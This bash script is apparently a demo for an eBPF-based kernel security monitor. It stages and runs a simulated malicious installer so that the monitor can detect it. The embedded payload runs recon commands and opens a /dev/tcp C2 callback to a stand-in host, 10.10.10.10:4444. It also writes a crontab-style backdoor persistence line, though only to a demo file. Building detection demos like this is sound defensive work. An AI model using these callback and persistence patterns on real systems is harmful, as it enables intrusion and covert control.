#!/usr/bin/env bash
# demo_attack.sh — Simulates the malicious install-script pattern
# curl payload | chmod +x | pre-exec
#
# This is the canonical curl|bash false-positive case.
# Kernel Security Monitor should detect the staging pattern and verify before blocking.
set -euo pipefail

PAYLOAD_DIR="/tmp/ksm-demo-$$"
PAYLOAD_FILE="$PAYLOAD_DIR/installer.sh"
C2_PORT=4444

echo "============================================="
echo " Kernel Security Monitor — Attack Simulation"
echo "============================================="
echo ""
echo "[*] Scenario: Download → Stage → chmod +x → (attempt exec)"
echo "[*] This simulates: curl payload | chmod +x | exec"
echo "[*] Kernel Security Monitor catches this staging sequence"
echo ""

# Clean up from previous runs
rm -rf "$PAYLOAD_DIR"
mkdir -p "$PAYLOAD_DIR"

echo "[1/5] Simulating curl download (writing payload to disk)..."
# We write a script that would attempt a C2 callback — this is the "malicious" part
cat > "$PAYLOAD_FILE" << 'PAYLOAD_EOF'
#!/bin/bash
# Simulated malicious payload — DO NOT run outside of demo
echo "[PAYLOAD] Stage 1: Gathering system info..."
whoami
uname -n
uname -a
echo "[PAYLOAD] Stage 2: Attempting C2 callback to 10.10.10.10:4444..."
exec 3<>/dev/tcp/10.10.10.10/4444 2>/dev/null || true
echo "[PAYLOAD] Stage 3: Attempting persistence in crontab..."
echo "* * * * * /tmp/backdoor" >> /tmp/ksm-demo-crontab 2>/dev/null || true
echo "[PAYLOAD] Stage 4: Payload beaconing active (PID $$)..."
for i in {1..30}; do
    sleep 0.5
done
echo "[PAYLOAD] Done."
PAYLOAD_EOF

sleep 1

echo "[2/5] Setting executable permission (chmod +x)..."
chmod +x "$PAYLOAD_FILE"
sleep 1

echo "[3/5] Waiting for Kernel Security Monitor to detect staging pattern..."
echo "       (watch the dashboard at http://localhost:8080)"
sleep 2

echo "[4/5] Attempting to execute staged payload..."
# Run in background so we can observe the monitor's response
"$PAYLOAD_FILE" &
PAYLOAD_PID=$!
echo "       Payload PID: $PAYLOAD_PID"

sleep 3

echo "[5/5] Checking process status..."
if kill -0 "$PAYLOAD_PID" 2>/dev/null; then
    echo ""
    echo "[ℹ] Payload process is running in OBSERVE MODE (PID $PAYLOAD_PID)"
    echo "    → In OBSERVE mode, monitor logs and alerts on the dashboard without killing."
    echo "    → Switch to ENFORCE mode in the dashboard header or pass '--mode enforce' to auto-kill threats!"
    kill -9 "$PAYLOAD_PID" 2>/dev/null || true
else
    echo ""
    echo "[✅] THREAT BLOCKED! Payload process was TERMINATED by BPF-LSM / SIGKILL!"
fi

echo ""
echo "============================================="
echo " Demo Complete"
echo "============================================="
echo " Check Kernel Security Monitor dashboard (http://localhost:8080) for:"
echo "   - Trust score drop for the payload process"
echo "   - ATT&CK technique matches (T1105 Ingress Tool Transfer, T1059 Command Execution)"
echo "   - AI Security Narration generated by your LLM"
echo "============================================="

# Cleanup
rm -rf "$PAYLOAD_DIR"
rm -f /tmp/ksm-demo-crontab
